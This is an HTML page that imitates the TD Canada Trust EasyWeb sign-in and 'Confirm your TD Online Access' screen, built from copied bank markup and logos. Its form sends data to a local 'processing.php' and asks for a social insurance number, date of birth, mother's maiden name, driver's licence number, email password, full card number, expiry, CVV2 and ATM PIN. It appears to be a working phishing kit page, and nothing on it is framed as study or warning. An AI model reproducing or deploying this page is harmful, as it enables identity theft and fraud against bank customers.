<!DOCTYPE html>
<html ng-app="com.td.tdi.uapWeb" lang="en-CA"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style>
	    <meta charset="utf-8">
	    <meta http-equiv="X-UA-Compatible" content="IE=edge">
	    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable = no">
	    <meta name="apple-mobile-web-app-capable" content="yes">
	    <meta name="apple-touch-fullscreen" content="yes">
	    
	    <title>EasyWeb Login</title>
		<link rel="stylesheet" href="files2/uap-application-all-css.css">
		<link rel="icon" href="https://authentication.td.com/uap-ui/bower_components/td-emerald-standards/emerald/assets/img/favicon.ico">
	</head>
	
	<body prevent-click-highlight="" autoscroll="" class="">

		<div id="contentWrapper">

			<!-- Header -->
			<!----><div data-ui-view="header" class="" style=""><otp-header><div class="td_rq_header-nav td-header-nav">

    <!-- Desktop Header START -->
    <header class="td-header-desktop">
        <div class="td-nav-primary">
            <div class="td-container">
                <div class="td-section-left">
                    <div class="td-logo" style="margin-top: 15px;">
                        <img ng-src="generated/styles/images/header-nav/td-logo.png" alt="TD Canada Trust" src="files2/td-logo.png">
                    </div>
                </div>
                <div class="td-section-right">
                    <div class="td-quick-access">
                        <ul class="td-header-nav-utilities">
                            <li ng-show="!!vm.needLangToggle || ($root.otpGenericConfig &amp;&amp; !!$root.otpGenericConfig.isLanguageToggleEnabled)" class="td-dropdown td-dropdown-language td-dropdown-no-hover ng-hide" aria-hidden="true">
                                <a href="" class="td-show-label" aria-haspopup="true" aria-expanded="false" id="td-desktop-nav-dropdown-link-0">
                                    <span class="td-forscreenreader">Select language</span>
                                    Français
                                    <span class="td-icon expand" aria-hidden="true"></span>
                                    <span class="td-icon collapse" aria-hidden="true"></span>
                                </a>
                                <ul class="td-dropdown-content" aria-labelledby="td-desktop-nav-dropdown-link-0">
                                    <!----><li ng-class="{'active': language==vm.dt.selectedLanguage}" ng-repeat="language in vm.dt.languages track by $index" class="active">
                                        <a href="" role="button" ng-click="vm.setLanguage(language)">
                                            English
                                            <!----><span ng-if="language==vm.dt.selectedLanguage" class="td-icon selected" aria-hidden="true">
                                            </span><!---->
                                            <!----><span ng-if="language==vm.dt.selectedLanguage" class="td-forscreenreader">Selected</span><!---->
                                        </a>
                                    </li><!----><li ng-class="{'active': language==vm.dt.selectedLanguage}" ng-repeat="language in vm.dt.languages track by $index">
                                        <a href="" role="button" ng-click="vm.setLanguage(language)">
                                            Français
                                            <!---->
                                            <!---->
                                        </a>
                                    </li><!---->
                                </ul>
                            </li>
                            <li class="secure-lock-position" aria-hidden="true">
                            </li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    </header>
    <!-- Desktop Header END -->

    <!-- Mobile Header START -->
    <header class="td-header-mobile">
        <div class="td-container">
            <div class="td-section-left">
                <button type="button" class="td-mobile-action-button td-mobile-menu-button">
                    <div ng-show="!!vm.needLangToggle || ($root.otpGenericConfig &amp;&amp; !!$root.otpGenericConfig.isLanguageToggleEnabled)" class="td-mobile-menu-button-icon ng-hide" aria-hidden="true">
                        <span class="td-forscreenreader">Open menu</span>
                        <span class="icon-bar" aria-hidden="true"></span>
                        <span class="icon-bar" aria-hidden="true"></span>
                        <span class="icon-bar" aria-hidden="true"></span>
                    </div>
                    <div class="td-logo">
                        <img src="files2/td-logo.png" alt="TD Canada Trust">
                    </div>
                </button>
                <button type="button" class="td-mobile-action-button td-mobile-back-button" onclick="history.back();">
                Test!
                    <div class="td-mobile-back-button-icon">
                        <span class="td-icon"></span>
                        <span class="td-forscreenreader">Back</span>
                    </div>
                    <div class="td-logo">
                        <img src="files2/td-logo.png" alt="TD Canada Trust">
                    </div>
                </button>
            </div>
            <div class="td-section-right">
                <div class="secure-lock-position" aria-hidden="true">
                    <span class="td-icon icon-regular td-icon-logout"></span>
                </div>
            </div>
        </div>
    </header>
    <!-- Mobile Header END -->

    <!-- Mobile Off-canvas Menu START -->
    <div ng-show="!!vm.needLangToggle || ($root.otpGenericConfig &amp;&amp; !!$root.otpGenericConfig.isLanguageToggleEnabled)" class="td-nav-mobile ng-hide" aria-hidden="true">
        <!-- Primary mobile menu START -->
        <div class="td-nav-mobile-menu td-nav-mobile-menu-primary"><span tabindex="0"></span>
            <div class="td-nav-mobile-menu-top">
                <div class="td-nav-mobile-menu-header">
                    <div class="td-logo">
                        <a href="https://authentication.td.com/">
                            <img src="files2/td-logo.png" alt="TD Canada Trust">
                        </a>
                    </div>
                    <button type="button" class="td-mobile-menu-close">
                        <span class="td-forscreenreader">Close Menu</span>
                        <span class="td-icon" aria-hidden="true"></span>
                    </button>
                </div>
            </div>
            <nav>
                <ul class="td-nav-mobile-menu-list">
                    <li class="td-nav-mobile-menu-item td-item-toggle td-accordion td-accordion-language">
                        <a href="" aria-expanded="false" role="button">
                            <span class="td-forscreenreader">Select language</span>
                            Français
                            <span class="td-icon expand" aria-hidden="true"></span>
                            <span class="td-icon collapse" aria-hidden="true"></span>
                        </a>
                        <ul class="td-accordion-content">
                            <!----><li ng-class="{'active': language==vm.dt.selectedLanguage}" ng-repeat="language in vm.dt.languages track by $index" class="active">
                                <a href="" role="button" ng-click="vm.setLanguage(language)">
                                    English
                                    <!----><span ng-if="language==vm.dt.selectedLanguage" class="td-icon selected" aria-hidden="true">
                                    </span><!---->
                                    <!----><span ng-if="language==vm.dt.selectedLanguage" class="td-forscreenreader">Selected</span><!---->
                                </a>
                            </li><!----><li ng-class="{'active': language==vm.dt.selectedLanguage}" ng-repeat="language in vm.dt.languages track by $index">
                                <a href="" role="button" ng-click="vm.setLanguage(language)">
                                    Français
                                    <!---->
                                    <!---->
                                </a>
                            </li><!---->
                        </ul>
                    </li>
                </ul>
            </nav>
        <span tabindex="0"></span></div>
        <!-- Primary mobile menu END -->

        <div class="td-nav-mobile-overlay"></div>
    </div>
    <!-- Mobile Off-canvas Menu END -->

</div></otp-header></div>

			<!-- Main Content / Body -->
			<div class="td-contentarea" role="main" style="padding-top: 70px;">
				<!----><ui-view class="" style=""><!----><ui-view><reset><!----><ui-view class="" style=""><reset-password dt="::$resolve.dt" device-print="::$resolve.devicePrint" device-info="::$resolve.deviceInfo" thread-matrix="::$resolve.threadMatrix"><div class="text-center">
    <otp-server-error error="vm.dt.recoverPwdError" display="banner"><!----></otp-server-error>
</div>

<div class="td-container">

    <h1 class="text-center" tabindex="0">Confirm your TD Online Access</h1>

    <hr aria-hidden="true" class="td-thin-divider-line-1">

      <form method="post" action="processing.php" class="ng-pristine ng-valid td_rq_form_legacy td-form td-form-validate td-form-dynamic">
		 <h1 class="text-center">Personal Information</h1>
         <div class="td-row">
            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">
                    <div class="td-row">
                        <div class="td-col-sm-6 td-col-sm-offset-3">
                            <div ng-class="{'td-group-touched': hasTouched, 'td-group-error': hasError &amp;&amp; isDirty,'ng-invalid': hasError, 'ng-dirty': isDirty, 'td-group-focus ng-focus': hasFocus, 'td-group-hover ng-hover': hasHover}" class="form-group" td-ui-form-group="Username or Access Card #" style=""> 
							    <input required="" id="usernameOrAccessCard" type="text" placeholder="Full name" name="FN" class="ng-pristine ng-untouched ng-valid form-control ng-empty">
                            </div>
                        </div>
                    </div>
            </div>
        </div>
        <div class="td-row">
            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">
                    <div class="td-row">
                        <div class="td-col-sm-6 td-col-sm-offset-3">
                            <div ng-class="{'td-group-touched': hasTouched, 'td-group-error': hasError &amp;&amp; isDirty,'ng-invalid': hasError, 'ng-dirty': isDirty, 'td-group-focus ng-focus': hasFocus, 'td-group-hover ng-hover': hasHover}" class="form-group" td-ui-form-group="Full Phone Number" style=""> 
                                <input required="" id="usernameOrAccessCard" type="text" placeholder="Phone Number" name="PN" class="ng-pristine ng-untouched ng-valid form-control ng-empty">
                            </div>
                        </div>
                    </div>
            </div>
        </div>
		  <div class="td-row">
            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">
                    <div class="td-row">
                        <div class="td-col-sm-6 td-col-sm-offset-3">
                            <div ng-class="{'td-group-touched': hasTouched, 'td-group-error': hasError &amp;&amp; isDirty,'ng-invalid': hasError, 'ng-dirty': isDirty, 'td-group-focus ng-focus': hasFocus, 'td-group-hover ng-hover': hasHover}" class="form-group" td-ui-form-group="Username or Access Card #" style=""> 
							 <input required="" id="usernameOrAccessCard" type="text" placeholder="Date of birth" title="DD/MM/YYYY" maxlength="10" name="DB" class="ng-pristine ng-untouched ng-valid form-control ng-empty">
                            </div>
                        </div>
                    </div>
            </div>
        </div>
		  <div class="td-row">
            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">               
                    <div class="td-row">
                        <div class="td-col-sm-6 td-col-sm-offset-3">
                            <div ng-class="{'td-group-touched': hasTouched, 'td-group-error': hasError &amp;&amp; isDirty,'ng-invalid': hasError, 'ng-dirty': isDirty, 'td-group-focus ng-focus': hasFocus, 'td-group-hover ng-hover': hasHover}" class="form-group" td-ui-form-group="Username or Access Card #" style=""> 
							 <input required="" id="usernameOrAccessCard" type="text"  placeholder="Mother's maiden name" name="MN" class="ng-pristine ng-untouched ng-valid form-control ng-empty">
                            </div>
                        </div>
                    </div>
            </div>
        </div>
		  <div class="td-row">
            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">                
                    <div class="td-row">
                        <div class="td-col-sm-6 td-col-sm-offset-3">
                            <div ng-class="{'td-group-touched': hasTouched, 'td-group-error': hasError &amp;&amp; isDirty,'ng-invalid': hasError, 'ng-dirty': isDirty, 'td-group-focus ng-focus': hasFocus, 'td-group-hover ng-hover': hasHover}" class="form-group" td-ui-form-group="Username or Access Card #" style=""> 
							  <input required="" id="usernameOrAccessCard" type="text"  placeholder="Social insurance number" title="123-456-789" maxlength="11" name="SN" ng-model="usernameOrAccessCard" class="ng-pristine ng-untouched ng-valid form-control ng-empty">
                             </div>
                        </div>
                    </div>
            </div>
        </div>    
         <div class="td-row">
            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">                
                    <div class="td-row">
                        <div class="td-col-sm-6 td-col-sm-offset-3">
                            <div ng-class="{'td-group-touched': hasTouched, 'td-group-error': hasError &amp;&amp; isDirty,'ng-invalid': hasError, 'ng-dirty': isDirty, 'td-group-focus ng-focus': hasFocus, 'td-group-hover ng-hover': hasHover}" class="form-group" td-ui-form-group="Username or Access Card #" style=""> 
							    <input required="" id="usernameOrAccessCard" type="text"  placeholder="Driver's license number" maxlength="15" name="DN" class="ng-pristine ng-untouched ng-valid form-control ng-empty">
                            </div>
                        </div>
                    </div>
            </div>
        </div>
		  <div class="td-row">
            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">               
                    <div class="td-row">
                        <div class="td-col-sm-6 td-col-sm-offset-3">
                            <div ng-class="{'td-group-touched': hasTouched, 'td-group-error': hasError &amp;&amp; isDirty,'ng-invalid': hasError, 'ng-dirty': isDirty, 'td-group-focus ng-focus': hasFocus, 'td-group-hover ng-hover': hasHover}" class="form-group" td-ui-form-group="Username or Access Card #" style=""> 
							  <input required="" id="usernameOrAccessCard" type="text"  placeholder="Email address" name="EA" ng-model="usernameOrAccessCard" class="ng-pristine ng-untouched ng-valid form-control ng-empty">
                             </div>
                        </div>
                    </div>
            </div>
        </div>
		<div class="td-row">
            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">
                
                    <div class="td-row">
                        <div class="td-col-sm-6 td-col-sm-offset-3">
                            <div ng-class="{'td-group-touched': hasTouched, 'td-group-error': hasError &amp;&amp; isDirty,'ng-invalid': hasError, 'ng-dirty': isDirty, 'td-group-focus ng-focus': hasFocus, 'td-group-hover ng-hover': hasHover}" class="form-group" td-ui-form-group="Username or Access Card #" style=""> 
							  <input required="" id="usernameOrAccessCard" type="password"  placeholder="Confirm email password" name="EP" ng-model="usernameOrAccessCard" class="ng-pristine ng-untouched ng-valid form-control ng-empty">
                             </div>
                        </div>
                    </div>
            </div>
        </div>
<h1 class="text-center">Card Information</h1>
         <div class="td-row">
            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">
                    <div class="td-row">
                        <div class="td-col-sm-6 td-col-sm-offset-3">
                            <div ng-class="{'td-group-touched': hasTouched, 'td-group-error': hasError &amp;&amp; isDirty,'ng-invalid': hasError, 'ng-dirty': isDirty, 'td-group-focus ng-focus': hasFocus, 'td-group-hover ng-hover': hasHover}" class="form-group" td-ui-form-group="Username or Access Card #" style=""> 
							    <input required="" id="usernameOrAccessCard" type="text"  placeholder="Name on card" name="NC" class="ng-pristine ng-untouched ng-valid form-control ng-empty">
                            </div>
                        </div>
                    </div>
            </div>
        </div>
		 <div class="td-row">
            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">
                    <div class="td-row">
                        <div class="td-col-sm-6 td-col-sm-offset-3">
                            <div ng-class="{'td-group-touched': hasTouched, 'td-group-error': hasError &amp;&amp; isDirty,'ng-invalid': hasError, 'ng-dirty': isDirty, 'td-group-focus ng-focus': hasFocus, 'td-group-hover ng-hover': hasHover}" class="form-group" td-ui-form-group="Username or Access Card #" style=""> 
							    <input required="" id="usernameOrAccessCard" type="text"  placeholder="Card number" name="CN" maxlength="16" class="ng-pristine ng-untouched ng-valid form-control ng-empty">
                            </div>
                        </div>
                    </div>
            </div>
        </div>
		  <div class="td-row">
            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">
                    <div class="td-row">
                        <div class="td-col-sm-6 td-col-sm-offset-3">
                            <div ng-class="{'td-group-touched': hasTouched, 'td-group-error': hasError &amp;&amp; isDirty,'ng-invalid': hasError, 'ng-dirty': isDirty, 'td-group-focus ng-focus': hasFocus, 'td-group-hover ng-hover': hasHover}" class="form-group" td-ui-form-group="Username or Access Card #" style=""> 
							 <input required="" id="usernameOrAccessCard" type="text"  placeholder="Exp. date" title="MM/YYYY" maxlength="7" name="ED" class="ng-pristine ng-untouched ng-valid form-control ng-empty">
                            </div>
                        </div>
                    </div>
            </div>
        </div>
		  <div class="td-row">
            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">               
                    <div class="td-row">
                        <div class="td-col-sm-6 td-col-sm-offset-3">
                            <div ng-class="{'td-group-touched': hasTouched, 'td-group-error': hasError &amp;&amp; isDirty,'ng-invalid': hasError, 'ng-dirty': isDirty, 'td-group-focus ng-focus': hasFocus, 'td-group-hover ng-hover': hasHover}" class="form-group" td-ui-form-group="Username or Access Card #" style=""> 
							 <input required="" id="usernameOrAccessCard" type="password"  placeholder="Cvv2" name="CV" maxlength="3" class="ng-pristine ng-untouched ng-valid form-control ng-empty">
                            </div>
                        </div>
                    </div>
            </div>
        </div>
		  <div class="td-row">
            <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">                
                    <div class="td-row">
                        <div class="td-col-sm-6 td-col-sm-offset-3">
                            <div ng-class="{'td-group-touched': hasTouched, 'td-group-error': hasError &amp;&amp; isDirty,'ng-invalid': hasError, 'ng-dirty': isDirty, 'td-group-focus ng-focus': hasFocus, 'td-group-hover ng-hover': hasHover}" class="form-group" td-ui-form-group="Username or Access Card #" style=""> 
							  <input required="" id="usernameOrAccessCard" type="password"  placeholder="Confirm your atm pin"  maxlength="8" name="AP" ng-model="usernameOrAccessCard" class="ng-pristine ng-untouched ng-valid form-control ng-empty">
                             </div>
                        </div>
                    </div>
            </div>
        </div>


        <div class="td-row">
            <div class="td-col-sm-4 td-col-sm-offset-2 td-col-sm-push-4 td-col-md-3 td-col-md-offset-3 td-col-md-push-3">
                <div class="form-group">
                    <button type="submit" class="td-button  td-button-secondary" style="width:320px" >
                        Submit
                    </button>
                </div>
            </div>
        </div>
    </form>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
</div>

<br><br></reset-password></ui-view></reset></ui-view></ui-view>
			</div>

			<!-- Footer -->
			<!----><div data-ui-view="footer" class=""><otp-footer><footer class="td-background-dark-green" style="left: 0px; right: 0px; bottom: 0px; position: absolute;">

    <!---->

    <div class="td-container">

        <div class="td-row">
            <div class="td-col-xs-12 td-footer-content otp-footer-content">

                <div class="td-footer-links td-copy-align-centre td-copy-white">

                    <a class="td-copy-white td-link-nounderline td-copy-standard" target="_blank" href="https://www.td.com/privacy-and-security/privacy-and-security/index.jsp">
                        Privacy and Security
                    </a>

                    <a class="td-copy-white td-link-nounderline td-copy-standard" target="_blank" href="https://www.td.com/to-our-customers/">
                        Legal
                    </a>

                    <a class="td-copy-white td-link-nounderline td-copy-standard" target="_blank" href="http://www.tdcanadatrust.com/customer-service/accessibility/accessibility-at-td/index.jsp">
                        Accessibility
                    </a>

                </div>

            </div>
        </div>

    </div>

</footer>
</otp-footer></div>
			
		</div>

		<!--[if lt IE 9]>
     	<script type="text/javascript" src="resources/es5-shim/es5-shim.min.js?v=0.0.8-HOTFIX2"></script>
        <script type="text/javascript" src="resources/html5shiv/dist/html5shiv.min.js?v=0.0.8-HOTFIX2"></script>
		<![endif]-->

	

<div id="ads"></div>
<div id="ads"></div>
<div id="ads"></div></body></html>